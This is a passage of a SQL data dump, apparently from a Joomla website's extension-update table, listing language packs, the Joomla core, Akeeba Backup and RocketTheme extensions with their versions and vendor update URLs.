LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4613,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4614,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4615,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4616,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4617,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(4618,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(4619,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(4620,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4621,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4622,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4623,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4624,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4625,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4626,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4627,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4628,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4629,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4630,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4631,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4632,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4633,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4634,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4635,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4636,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4637,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4638,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4639,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4640,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4641,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4642,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4643,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4644,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4645,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4646,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4647,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4648,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4649,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4650,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4651,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4652,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4653,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4654,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4655,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4656,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4657,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4658,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4659,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4660,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4661,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4662,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4663,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4664,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4665,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4666,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4667,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4668,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4669,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4670,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4671,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4672,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4673,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4674,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4675,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4676,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4677,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4678,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4679,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4680,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4681,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4682,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4683,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4684,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4685,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4686,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4687,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4688,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4689,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4690,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(4691,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(4692,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(4693,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(4694,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(4695,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(4696,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4697,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4698,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4699,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4700,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4701,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4702,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4703,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4704,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4705,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4706,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4707,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4708,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4709,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4710,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4711,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4712,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4713,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4714,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4715,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4716,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4717,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4718,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4719,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4720,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4721,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4722,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4723,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4724,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4725,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4726,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4727,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4728,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4729,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4730,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4731,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4732,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4733,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4734,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4735,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4736,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4737,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4738,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4739,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4740,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4741,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4742,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(4743,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(4744,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(4745,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4746,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4747,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4748,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4749,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4750,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4751,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4752,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4753,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4754,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4755,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4756,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4757,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4758,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4759,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4760,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4761,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4762,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4763,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4764,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4765,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4766,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4767,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4768,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4769,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4770,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4771,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4772,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4773,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4774,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4775,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4776,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4777,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4778,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4779,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4780,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4781,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4782,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4783,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4784,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4785,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4786,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4787,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4788,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4789,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4790,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4791,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4792,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4793,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4794,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(4795,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(4796,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(4797,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(4798,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(4799,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(4800,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4801,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4802,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4803,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4804,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4805,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4806,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4807,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4808,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4809,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4810,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4811,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4812,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4813,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4814,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4815,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4816,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4817,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4818,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4819,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4820,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4821,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4822,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4823,57,0,'English 